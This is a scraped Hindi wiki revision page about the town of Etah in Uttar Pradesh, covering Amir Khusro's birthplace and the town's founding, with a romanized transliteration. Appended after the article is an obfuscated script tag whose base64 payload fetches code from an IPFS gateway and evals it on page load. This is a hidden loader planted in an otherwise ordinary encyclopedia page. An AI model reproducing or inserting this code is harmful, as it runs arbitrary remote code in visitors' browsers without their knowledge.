Difference between revisions of "एटा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
*[[ब्रजभाषा]] के महान कवि और संगीतकार [[अमीर ख़ुसरो]] दहलवी का जन्म [[उत्तर प्रदेश]] के एटा ज़िले के पटियाली नामक ग्राम में [[गंगा नदी|गंगा]] किनारे हुआ था।  
 
*[[ब्रजभाषा]] के महान कवि और संगीतकार [[अमीर ख़ुसरो]] दहलवी का जन्म [[उत्तर प्रदेश]] के एटा ज़िले के पटियाली नामक ग्राम में [[गंगा नदी|गंगा]] किनारे हुआ था।  
*एटा [[भारत]] के उत्तर प्रदेश प्रान्त का एक शहर है |
+
*एटा [[भारत]] के उत्तर प्रदेश प्रान्त का एक शहर है।
 
*एटा ज़िला मुख्यालय है।  
 
*एटा ज़िला मुख्यालय है।  
 
*इसे [[पृथ्वीराज चौहान]] के सरदार राजा संग्राम सिंह ने बसाया था। इसने एटा में एक सुदृढ़ मिट्टी का दुर्ग बनवाया था जिसके खंडहर आज भी मौजूद हैं।
 
*इसे [[पृथ्वीराज चौहान]] के सरदार राजा संग्राम सिंह ने बसाया था। इसने एटा में एक सुदृढ़ मिट्टी का दुर्ग बनवाया था जिसके खंडहर आज भी मौजूद हैं।

Revision as of 11:13, 18 May 2011

  • brajabhasha ke mahan kavi aur sangitakar amir khusaro dahalavi ka janm uttar pradesh ke eta zile ke patiyali namak gram mean ganga kinare hua tha.
  • eta bharat ke uttar pradesh prant ka ek shahar hai.
  • eta zila mukhyalay hai.
  • ise prithviraj chauhan ke saradar raja sangram sianh ne basaya tha. isane eta mean ek sudridh mitti ka durg banavaya tha jisake khandahar aj bhi maujood haian.

sanbandhit lekh


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>